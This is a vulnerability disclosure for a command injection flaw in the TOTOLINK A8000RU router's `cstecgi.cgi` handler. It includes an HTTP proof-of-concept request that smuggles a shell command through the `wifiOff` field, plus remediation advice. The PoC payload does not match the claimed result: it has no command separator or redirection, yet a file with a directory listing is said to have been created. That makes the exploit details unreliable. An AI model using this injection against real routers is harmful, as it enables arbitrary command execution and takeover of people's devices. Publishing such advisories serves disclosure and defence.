# A8000RU Command Injection Vulnerability Summary ## Vulnerability Overview The TOTOLINK A8000RU router has a command injection vulnerability. An attacker can craft a malicious request and exploit the `addEffect` parameter in `cstecgi.cgi` to control the value of `wifiOff`. This allows user input to be concatenated into the `uci set` command via the `Uci_Set_Str` function, which is ultimately executed through `exec`, enabling arbitrary system command execution. ## Impact Scope - **Vendor**: TOTOLINK - **Product**: A8000RU - **Version**: 7.1cu.643_b20200521 - **Vulnerability Type**: Command Injection ## Remediation - The vendor has not yet provided an official patch. - Users are advised to temporarily disable the affected feature or restrict access to `cstecgi.cgi`. - Upgrade to a fixed version if available. ## Proof-of-Concept (PoC) ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.6.2 Content-Length: 92 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Origin: http://192.168.6.2 Referer: http://192.168.6.2/basic/index.html Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=21772465702.2 Connection: keep-alive {"topiscurl":"setWIFIBasicCfg","addEffect":"1","wifiOff":"1 ls /setWIFIBasicCfg.txt"} ``` ## Verification Result After sending the above request, the router successfully created the file `setWIFIBasicCfg.txt`, whose content was the directory listing from the location of `/setWIFIBasicCfg.txt`, proving that the command injection was successful.